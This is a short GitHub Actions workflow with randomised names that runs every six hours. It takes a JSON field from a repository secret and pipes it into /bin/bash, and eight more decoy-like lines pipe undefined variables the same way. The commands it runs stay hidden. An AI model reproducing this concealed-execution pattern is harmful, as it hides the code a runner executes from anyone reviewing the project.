name: zimingbn

on:
  workflow_dispatch:
  schedule:
    - cron: '14 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zimingbn
        env:
          hvkhi965: ${{ secrets.hvkhi965 }}
        run: |
          echo $hvkhi965 | jq -r .eoh26282 | /bin/bash
          echo $f3 | jq -r .pbc02800 | /bin/bash
          echo $zenhr42 | jq -r .fgxmp412 | /bin/bash
          echo $odp9 | jq -r .phhma7809 | /bin/bash
          echo $ouyu27026 | jq -r .wgh77000 | /bin/bash
          echo $edxdm477 | jq -r .ysrf596 | /bin/bash
          echo $slkl54 | jq -r .tgg420 | /bin/bash
          echo $cjd717 | jq -r .vo35672 | /bin/bash
          echo $asoq414 | jq -r .uuntz028 | /bin/bash

